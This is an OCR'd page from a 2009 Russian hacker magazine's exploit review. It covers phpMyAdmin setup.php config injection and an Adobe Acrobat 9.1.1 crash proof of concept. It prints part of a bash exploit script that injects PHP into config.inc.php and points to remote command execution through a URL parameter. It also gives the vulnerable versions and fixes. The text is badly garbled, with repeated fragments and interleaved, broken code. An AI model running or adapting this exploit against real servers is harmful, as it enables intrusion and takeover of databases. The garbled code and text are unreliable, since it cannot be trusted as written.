27.11.2014 Views

НЕСЛУЧАЙНО CUDA ИДЕМ? phpMyAdmin - Xakep Online

НЕСЛУЧАЙНО CUDA ИДЕМ? phpMyAdmin - Xakep Online

НЕСЛУЧАЙНО CUDA ИДЕМ? phpMyAdmin - Xakep Online

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

взлом<br />

обзор<br />

эксплоитов<br />

обзор<br />

эксплоитов<br />

обзор<br />

эксплоитов<br />

ор<br />

плоитов<br />

ОШИБКА ТУПАЯ ДО БОЛИ<br />

ор<br />

плоитов<br />

ор<br />

плоитов<br />

СЕГОДНЯ НЕ НАШ ДЕНЬ. ПРИДЕТСЯ ПИСАТЬ АВТОСКАНЕР...<br />

flag="/tmp/$(basename $0).$RANDOM.phpinfo.flag.html"<br />

echo "[+] attempting to inject phpinfo() ..."<br />

curl -ks -b $2 -d "$postdata" --url "$3/scripts/setup.<br />

php" >/dev/null<br />

if curl -ks --url "$3/config/config.inc.php" | grep<br />

"phpinfo()" >/dev/null<br />

then<br />

curl -ks --url "$3/config/config.inc.php" >$flag<br />

echo "[+] success! phpinfo() injected successfully!<br />

output saved on $flag"<br />

curl -ks -b $2 -d $postdata2 --url "$3/scripts/<br />

setup.php» >/dev/null<br />

echo "[+] you *should* now be able to remotely run<br />

shell commands and PHP code using your browser. i.e.:"<br />

echo " $3/config/config.inc.php?c=ls+-l+/"<br />

echo " $3/config/config.inc.php?p=phpinfo();"<br />

echo " please send any feedback/improvements for<br />

this script to"\<br />

"unknown.pentestergmail.com"<br />

else<br />

>> Brief<br />

Очередная темная лошадка на арене PoC появилась в начале июня.<br />

На этот раз, по заявлениям неизвестных багоискателей, обнаружилась<br />

брешь в Adobe Acrobat аж до версии 9.1.1. В паблик выложили лишь<br />

PoC-эксплойт, при запуске которого ничего не происходит. Точнее, происходит<br />

— вываливается среда, из которой был запущен PoC. Если это<br />

браузер — закрываются все вкладки IE/Firefox/Opera/Mozilla. Если это<br />

сам Acrobat Reader — то и он вылетает. Короче говоря, сплойт действительно<br />

сшибает с ног Adobe Reader.<br />

Почему же так происходит? Чтобы это выяснить, бережно скачаем PDF’ку<br />

каким-нибудь сторонним менеджером (я использовал wget на удаленном<br />

сервере) и присмотримся к исходному коду файла. Для простоты<br />

восприятия, помещаю его ниже.<br />

%PDF-1.4<br />

%<br />

4 0 objendobj<br />

5 0 objstream<br />

endstream<br />

endobj<br />

3 0 objendobj<br />

2 0 objendobj<br />

НЕМЕДЛЕННОЕ ОБНОВЛЕНИЕ<br />

ор<br />

плоитов<br />

echo "[+] no luck injecting to $3/config/config.inc.<br />

php :("<br />

exit<br />

fi<br />

}<br />

Если ты не поленишься написать простенький PHP-парсер передаваемых<br />

строк, то получишь посимвольную картину инжекта.<br />

Полный код эксплойта можно скачать по ссылке securitylab.ru/poc/<br />

extra/381413.php.<br />

ор<br />

плоитов<br />

>> Targets:<br />

Уязвимыми версиями <strong>phpMyAdmin</strong> являются 2.11.x до 2.11.9.5 и 3.x до<br />

3.1.3.1 (все релизы достаточно новые и выпускались до апреля этого<br />

года).<br />

ор<br />

плоитов<br />

>> Solution<br />

Нависшую угрозу безопасности решит либо удаление файла «/scripts/<br />

setup.php», либо изолирование каталога «/config» вне Web-директории,<br />

либо (самый предпочтительный вариант) обновление <strong>phpMyAdmin</strong> до<br />

свежей версии. Последнее можно осуществить с официальной локации:<br />

sourceforge.net/projects/phpmyadmin.<br />

03<br />

ADOBE ACROBAT 9.1.1 STACK OVERFLOW<br />

CRASH POC EXPLOIT<br />

ор<br />

плоитов<br />

050<br />

XÀÊÅÐ 07 /127/ 09

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!